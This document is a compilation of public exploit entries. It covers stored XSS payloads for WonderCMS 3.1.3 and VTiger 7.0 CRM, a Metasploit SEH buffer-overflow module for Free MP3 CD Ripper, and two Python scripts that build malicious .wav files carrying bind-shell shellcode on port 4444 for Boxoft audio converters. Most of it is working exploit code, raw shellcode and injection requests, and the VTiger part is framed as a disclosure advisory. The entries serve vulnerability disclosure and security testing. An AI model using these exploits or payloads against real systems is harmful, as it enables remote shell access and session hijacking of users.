# Exploit Title: WonderCMS 3.1.3 - 'content' Persistent Cross-Site Scripting # Date: 20-11-2020 # Exploit Author: Hemant Patidar (HemantSolo) # Vendor Homepage: https://www.wondercms.com/ # Version: 3.1.3 # Tested on: Windows 10/Kali Linux # CVE: CVE-2020-29233 Stored Cross-site scripting(XSS): Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser. Attack vector: This vulnerability can results attacker to inject the XSS payload in Page description and each time any user will visits the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload. Vulnerable Parameters: Page description. Steps-To-Reproduce: 1. Go to the Simple website builder. 2. Put this payload in Page description: "hemantsolo"><img src=x onerror=confirm(1)>" 3. Now go to the website and the XSS will be triggered. POST /demo/ HTTP/1.1 Host: 127.0.0.1 Connection: close Content-Length: 196 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 DNT: 1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept: */* Origin: 127.0.0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: 127.0.0.1/demo/ Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6 Cookie: PHPSESSID=da4eae35135fd9ce3c413b936e2e5925 fieldname=description&token=c526c8235770f7efe7b7868a806f51f9a48545e117e00534e5cd82fde1bf1064&content=HemantSoloHacker%22%3E%3Cimg%20src%3Dx%20onerror%3Dconfirm(1)%3E&target=pages&menu=&visibility=

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT def initialize(info={}) super(update_info(info, 'Name' => "Free MP3 CD Ripper 2.6 < 2.8 (.wma.wav.flac.m3u.acc) Buffer Overflow", 'Description' => %q{ This module exploits a buffer overflow in Free MP3 CD Ripper versions 2.6 and 2.8. By constructing a specially crafted WMA WAV M3U ACC FLAC file and attempting to convert it to an MP3 file in the application, a buffer is overwritten, which allows for running shellcode. }, 'License' => MSF_LICENSE, 'Author' => [ 'Gionathan Reale', # Exploit-DB POC 'ZwX' # Metasploit Module ], 'References' => [ [ 'CVE', '2019-9767' ], [ 'EDB', '45412' ], [ 'URL', 'https://www.exploit-db.com/exploits/45412' ] ], 'Platform' => 'win', 'Targets' => [ [ 'Windows 7 x86 - Windows 7 x64', { 'Ret' => 0x66e42121 # POP POP RET } ] ], 'Payload' => { 'BadChars' => "\x00\x0a\x0d\x2f" }, 'Privileged' => false, 'DisclosureDate' => "Sep 09 2018", 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [true, 'Create malicious file example extension (.wma .wav .acc .flac .m3u)', 'name.wma']) ]) end def exploit file_payload = payload.encoded msfsploit = make_fast_nops(4116) msfsploit << "\xeb\x06#{Rex::Text.rand_text_alpha(2, payload_badchars)}" # NSEH_JMP msfsploit << [target.ret].pack("V*") # SEH msfsploit << file_payload msfsploit << make_fast_nops(4440) file_create(msfsploit) end end

# Exploit Title: Boxoft Audio Converter 2.3.0 - '.wav' Buffer Overflow (SEH) # Discovery by: Luis Martinez # Discovery Date: 2020-11-22 # Vendor Homepage: http://www.boxoft.com/ # Software Link: http://www.boxoft.com/audio-converter/a-pdf-bac.exe # Tested Version: 2.3.0 # Vulnerability Type: Local Buffer Overflow (SEH) # Tested on OS: Windows 10 Pro (10.0.18362) x64 en # Steps to Produce the Local Buffer Overflow (SEH): # 1.- Run python code: Boxotf_Audio_Converter_2.3.0.py # 2.- Open AudioConvert.exe # 3.- Try # 4.- Batch Convert Mode -> Next # 5.- Add # 6.- Select Boxotf_Audio_Converter_2.3.0.wav -> Open # 7.- Port 4444 open #!/usr/bin/env python #-*-coding: utf-8-*- #msfvenom -p windows/shell_bind_tcp -b '\x00\x0A\x0D' -f c shellcode = ("\xbb\x80\x84\x2c\xbc\xda\xce\xd9\x74\x24\xf4\x5e\x33\xc9\xb1" "\x53\x31\x5e\x12\x83\xc6\x04\x03\xde\x8a\xce\x49\x22\x7a\x8c" "\xb2\xda\x7b\xf1\x3b\x3f\x4a\x31\x5f\x34\xfd\x81\x2b\x18\xf2" "\x6a\x79\x88\x81\x1f\x56\xbf\x22\x95\x80\x8e\xb3\x86\xf1\x91" "\x37\xd5\x25\x71\x09\x16\x38\x70\x4e\x4b\xb1\x20\x07\x07\x64" "\xd4\x2c\x5d\xb5\x5f\x7e\x73\xbd\xbc\x37\x72\xec\x13\x43\x2d" "\x2e\x92\x80\x45\x67\x8c\xc5\x60\x31\x27\x3d\x1e\xc0\xe1\x0f" "\xdf\x6f\xcc\xbf\x12\x71\x09\x07\xcd\x04\x63\x7b\x70\x1f\xb0" "\x01\xae\xaa\x22\xa1\x25\x0c\x8e\x53\xe9\xcb\x45\x5f\x46\x9f" "\x01\x7c\x59\x4c\x3a\x78\xd2\x73\xec\x08\xa0\x57\x28\x50\x72" "\xf9\x69\x3c\xd5\x06\x69\x9f\x8a\xa2\xe2\x32\xde\xde\xa9\x5a" "\x13\xd3\x51\x9b\x3b\x64\x22\xa9\xe4\xde\xac\x81\x6d\xf9\x2b" "\xe5\x47\xbd\xa3\x18\x68\xbe\xea\xde\x3c\xee\x84\xf7\x3c\x65" "\x54\xf7\xe8\x10\x5c\x5e\x43\x07\xa1\x20\x33\x87\x09\xc9\x59" "\x08\x76\xe9\x61\xc2\x1f\x82\x9f\xed\x0e\x0f\x29\x0b\x5a\xbf" "\x7f\x83\xf2\x7d\xa4\x1c\x65\x7d\x8e\x34\x01\x36\xd8\x83\x2e" "\xc7\xce\xa3\xb8\x4c\x1d\x70\xd9\x52\x08\xd0\x8e\xc5\xc6\xb1" "\xfd\x74\xd6\x9b\x95\x15\x45\x40\x65\x53\x76\xdf\x32\x34\x48" "\x16\xd6\xa8\xf3\x80\xc4\x30\x65\xea\x4c\xef\x56\xf5\x4d\x62" "\xe2\xd1\x5d\xba\xeb\x5d\x09\x12\xba\x0b\xe7\xd4\x14\xfa\x51" "\x8f\xcb\x54\x35\x56\x20\x67\x43\x57\x6d\x11\xab\xe6\xd8\x64" "\xd4\xc7\x8c\x60\xad\x35\x2d\x8e\x64\xfe\x5d\xc5\x24\x57\xf6" "\x80\xbd\xe5\x9b\x32\x68\x29\xa2\xb0\x98\xd2\x51\xa8\xe9\xd7" "\x1e\x6e\x02\xaa\x0f\x1b\x24\x19\x2f\x0e") nSEH = "\xeb\x06\x90\x90" SEH = "\xB8\x68\x40\x00" #AudioConvert.exe buffer = "\x41" * 4132 + nSEH + SEH + "\x90" * 16 + shellcode f = open ("Boxotf_Audio_Converter_2.3.0.wav", "w") f.write(buffer) f.close()

# Exploit Title: Boxoft Convert Master 1.3.0 - 'wav' SEH Local Exploit # Date: 17.09.2020 # Vendor Homepage: http://www.boxoft.com/ # Software Link: http://www.boxoft.com/convert-master/setup(boxoft-conver=t-master).exe # Exploit Author: Achilles # Tested Version: 1.3.0 # Tested on: Windows 7 x64 # 1.- Run python code :Boxoft_Convert_Master.py # 2.- Open Boxoft_Convert_Master.exe # 3.- Click try and Batch Convert Mode # 4.- Add Evil.wav # 5.- And you will have a bind shell port 4444 # 6.- Greetings go:XiDreamzzXi,Metatron #!/usr/bin/env python import struct buffer = "\x41" * 4132 nseh = "\xeb\x06\x90\x90" #jmp short 6 seh = struct.pack('<L',0x6d00c683) #CDRip122.dll nops = "\x90" * 20 #Bind=shellcode port 4444 shellcode = ("\xda\xd5\xb8\x9b\x69\x4d\xa1\xd9\x74\x24\xf4\x5a\x33" "\xc9\xb1\x60\x83\xc2\x04\x31\x42\x15\x03\x42\x15\x79" "\x9c\xf2\x9b\x0c\xb0\x35\x05\x03\x97\x32\x91\x2f\x75" "\x92\x10\x7e\xdf\xd5\xdf\x95\x63\xd0\x24\x96\x1e\xca" "\xc6\x57\x4b\xd9\xe7\x3c\xe4\x1c\xa0\xd9\x7e\x72\xe4" "\x38\x26\xd1\x92\x88\x79\x63\x55\xe3\x94\xfe\x9a\xac" "\xb5\xde\xe4\x35\xbc\xd0\x9f\xe6\x92\x63\x51\x5a\xaf" "\xad\x1b\xb0\xf9\x6e\x46\xac\x68\xa9\x48\xce\xb8\xe1" "\xd2\xf5\x1a\x7d\x84\xde\xb9\x55\xa0\xe8\xe3\xd8\xb2" "\x31\xfb\x1a\x0b\xea\xed\xf4\x8f\xdd\xf5\x55\xbf\x1a" "\xa5\xe8\xd8\xfa\xde\x45\x11\x7c\x4d\xea\x87\x0f\x9f" "\xe5\xdf\x90\x18\x7e\x52\x1b\xd7\x24\x22\xab\x1b\xda" "\x31\xa2\x75\x8f\xa3\x13\x99\x20\x5e\x07\x57\x68\x3e" "\x10\xc7\xc2\xb0\x2b\xa0\x13\xd6\x6a\x3e\xc3\x1e\x99" "\x4f\xf0\xce\x63\x50\xe3\x90\x80\x3e\x0e\x9c\x39\x7e" "\x48\xe6\xf0\xe7\x3b\xd3\x7d\xe3\xa3\x62\x41\xee\x19" "\xd0\xa8\xc9\xdb\x02\x93\x0f\x34\xb0\xad\x81\x08\x57" "\xce\xb8\x38\xfe\x13\xc9\xe7\x40\xc2\x17\xa6\x3a\x4c" "\x06\x31\xfc\x3f\x8f\xcb\x85\x84\x74\x98\x9c\x63\xe5" "\x46\x2f\xfc\x15\x3b\x5c\x37\xd3\x36\xfc\x39\x3c\x86" "\x29\x32\xbb\xb3\x04\x13\x6a\xd1\xa7\x55\xac\x8e\xa8" "\x05\xaf\xc3\xae\x9d\xc6\x5f\xa8\x9d\x8e\x4a\x25\x3a" "\x35\xa3\xd7\x4c\xaa\xb1\x87\xca\x54\x6d\xdc\xb2\xf3" "\x3a\xaa\x29\xea\x44\x01\x4e\xb0\x08\x9a\xd0\xb5\x69" "\x42\xe5\xb4\x5f\x59\xff\xb4\x90\xe2\x97\x66\x09\x89" "\x87\x8e\xff\xa8\x21\x68\x3f\x01\xe9\xb3\x27\x63\xd2" "\x93\x2f\x4d\x9c\x28\x21\xd4\x9d\xad\x8f\x24\x19\xc9" "\x98\xbc\x24\x0b\x47\x84\x9c\x57\xd2\x20\x79\x71\x67" "\xe0\xd1\xcd\x40\x51\x7d\xe2\x39\xa9\xd2\x92\x4c\x24" "\x59\x7b\xfd\x89\x6e\xea\xec\xc8\xac\x54\x8a\x26\x60" "\x81\x38\x06\x32\xab\x56\x1c\xe7\xd0\x78\xe5\xa2\x75" "\xc8\x28\x1b\xd5\x3f\x51") payload = buffer + nseh + seh + nops + shellcode try: f=open("Evil.wav","w") print "[+] Creating %s bytes evil payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created"

# Exploit Title: VTiger v7.0 CRM - 'To' Persistent XSS # Date: 2020-11-18 # Exploit Vulnerability-Lab # Vendor Homepage: https://www.vtiger.com/open-source-crm/download-open-source/ # Software Link: https://sourceforge.net/projects/vtigercrm/files/ # Version: v7.0 Document Title: =============== VTiger v7.0 CRM - (To) Persistent Email Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2227 Release Date: ============= 2020-11-18 Vulnerability Laboratory ID (VL-ID): ==================================== 2227 Common Vulnerability Scoring System: ==================================== 4.8 Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 1.000€ - 2.000€ Product & Service Introduction: =============================== Vtiger CRM is web-application built using PHP. Choose the best CRM for your business. Custom Module & Relationship builder for VTiger is a very useful extension that allows crm administrators to create custom modules within few clicks. All custom modules are created following strict VTiger standards. In addition, the relationship builder allows crm admin to link together existing modules as well as new custom modules. (Copy of the Homepage: https://www.vtiger.com/open-source-crm/download-open-source/ ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a persistent cross site vulnerability in the VTiger v7.0 CRM open-source web-application. Affected Product(s): ==================== VTExperts Product: VTiger v7.0 - CRM (Web-Application) Vulnerability Disclosure Timeline: ================================== 2020-04-27: Public Disclosure (Vulnerability Laboratory) 2020-04-28: Researcher Notification & Coordination (Security Researcher) 2020-04-29: Vendor Notification 1 (Security Department) 2020-05-30: Vendor Notification 2 (Security Department) 2020-06-22: Vendor Notification 3 (Security Department) ****-**-**: Vendor Response/Feedback (Security Department) ****-**-**: Vendor Fix/Patch (Service Developer Team) ****-**-**: Security Acknowledgements (Security Department) 2020-11-18: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (Guest Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Full Disclosure Technical Details & Description: ================================ A persistent input validation web vulnerability has been discovered in the official VTiger v7.0 CRM open-source web-application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The persistent cross site scripting web vulnerability is located in the `searchValue` Parameter of the `Emails Compose` module. Attackers are able to inject own mlicious script code in the `To` sender input field of the email compose module to attack other user accounts. The email can be delivered with multiple receipients which allows an attacker to insert the target email and a malicious payload. The request method to inject is GET via searchValue and POST on compose with persistent attack vector. Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST [+] GET Vulnerable Module(s): [+] Email Compose (index.php?module=Emails) Vulnerable Input(s): [+] To (Sender - Email) Proof of Concept (PoC): ======================= The persistent input validation web vulnerability can be exploited by remote attackers with low privileged account and with low user interaction. For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue. PoC: Url http://localhost:8080/vtigercrm/index.php?module=Vendors&relatedModule=Emails&view=Detail&record=3883&mode=showRelatedList&relationId=62&tab_label=Emails&app=INVENTORY# Manual steps to reproduce the vulnerability ... 1. Open the web-application ui 2. Login with a regular user role to the ui 3. Open vendors and move to compose to email form 4. Inject malicious payload as "to" sender information and as well a valid email to target 5. Send the request after the compose 6. Wait until the administrator or higher privileged targeted users click in the email or receives the email on preview 7. Successful reproduce of the cross site scripting web vulnerability! PoC: Vulnerable Source (Execution Point) <div class="col-lg-12"><div class="col-lg-2"><span class="pull-right">To&nbsp;<span class="redColor">*</span></span></div> <div class="col-lg-6"><div class="select2-container select2-container-multi autoComplete sourceField select2" id="s2id_emailField" style="width: 100%;"><ul class="select2-choices ui-sortable"> <li class="select2-search-choice"> <div>IT <b>([email protected])</b></div> <a href="#" class="select2-search-choice-close" tabindex="-1"></a></li> <li class="select2-search-choice"><div><iframe src"evil.source" onload=alert(document.cookie)></div></iframe></div> --- PoC Session Logs [GET] --- http://localhost:8080/vtigercrm/index.php?module=Emails&action=BasicAjax&searchValue=>"<iframe+src%3Da+onload%3Dalert(document.cookie)>&_=1587844428851 Host: localhost:8080 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest Connection: keep-alive Referer: http://localhost:8080/vtigercrm/index.php?module=Vendors&relatedModule=Emails&view=Detail&record=3883&mode=showRelatedList&relationId=62&tab_label=Emails&app=INVENTORY Cookie: PHPSESSID=ni2357om9nni5vvhovf20rkt51 - GET: HTTP/1.1 200 OK Server: Apache/2.4.10 (Debian) Content-Length: 28 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive - Content-Type: text/json; charset=UTF-8 http://localhost:8080/vtigercrm/evil.source Host: localhost:8080 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive Referer: http://localhost:8080/vtigercrm/index.php?module=Vendors&relatedModule=Emails&view=Detail&record=3883&mode=showRelatedList&relationId=62&tab_label=Emails&app=INVENTORY Cookie: PHPSESSID=ni2357om9nni5vvhovf20rkt51 - GET: HTTP/1.1 200 OK Server: Apache/2.4.10 Content-Length: 299 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Reference(s): http://localhost:8080/vtigercrm/ http://localhost:8080/vtigercrm/index.php http://localhost:8080/vtigercrm/index.php?module=Emails&action=BasicAjax&searchValue= Security Risk: ============== The security risk of the persistent web vulnerability i the web-application is estimated as medium. Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2020 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com